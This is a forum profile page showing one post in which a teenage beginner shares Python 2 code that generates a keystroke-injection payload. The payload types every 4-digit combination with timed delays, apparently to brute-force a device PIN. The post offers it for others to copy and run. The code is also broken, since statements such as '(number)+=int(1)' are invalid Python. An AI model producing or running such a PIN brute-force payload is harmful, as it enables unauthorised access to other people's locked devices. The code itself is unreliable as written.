Jump to content

Reynold S.

Members
  • Posts

    1
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

Reynold S.'s Achievements

Newbie

Newbie (1/14)

  1. Hey I make a script to make the 4 digit combination in Python so, if you have Python just copy the code and then run it and in the output you will have the combination. In Python was more hard to make because Python is not maked to do Bruteforce and their limit but finally I make the code so. (I am Just 15 Years and a starter on Python so possible the code can be better than that) Here is the code: """ change x=int(Put a number) Down Put only 1-9 and copy all code and then you have the Payload """ x=int(0) number=int(0) while (number)<=9: print"STRING",(str(x))+"00"+str(number) print"ENTER" if (number) in list(range(0,9,5)): print"DELAY 34250" (number)+=int(1) else: number+=int(1) if (number) == 10: while number <= int(100): print"STRING",(str(x))+"0"+str(number) print"ENTER" if (number) in list(range(10,100,5)): print"DELAY 34250" (number)+=int(1) else: (number)+=int(1) if (number) == int(100): while number != int(1000): print"STRING",(str(x))+str(number) print"ENTER" if (number) in list(range(100,999,5)): print"DELAY 34250" (number)+=int(1) else: (number)+=int(1) if (number) == int(1000): x+=int(1) break
×
×
  • Create New...